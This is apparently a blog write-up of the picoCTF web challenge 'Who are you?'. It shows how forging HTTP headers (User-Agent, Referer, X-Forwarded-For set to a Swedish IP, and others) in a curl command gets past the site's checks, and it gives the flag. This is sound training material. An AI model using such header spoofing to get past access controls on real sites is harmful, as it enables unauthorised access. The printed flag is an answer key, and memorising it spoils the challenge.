picoCTF Who are you? [100 points]
Who are you?
points:100
Description
Let me in. Let me iiiiiiinnnnnnnnnnnnnnnnnnnn http://mercury.picoctf.net:38322/
Hints
It ain’t much, but it’s an RFC https://tools.ietf.org/html/rfc2616
Solution
一開始可以看到網頁有個提示:use PicoBrowser
User-Agent: PicoBrowser
I don’t trust users visiting from another site.
Referer: http://mercury.picoctf.net:38322/
Sorry, this site only worked in 2018.
Date: 2018
I don’t trust users who can be tracked.
DNT: 1
This website is only for people from Sweden.
X-Forwarded-For: 2.16.66.0
You’re in Sweden but you don’t speak Swedish?
Accept-Language: sv
What can I say except, you are welcome
使用curl更改配送後送出得到flag
curl 'http://mercury.picoctf.net:38322/' \
--header 'User-Agent: PicoBrowser' \
--header 'Referer: http://mercury.picoctf.net:38322/' \
--header 'Date: 2018' \
--header 'DNT: 1' \
--header 'X-Forwarded-For: 2.16.66.0' \
--header 'Accept-Language: sv'
flag: picoCTF{http_h34d3rs_v3ry_c0Ol_much_w0w_b22d773c}
本部落格所有文章除特別聲明外,均採用 CC BY-NC-SA 4.0 許可協議。轉載請註明來自 LuYee6813's Blog | 技術分享!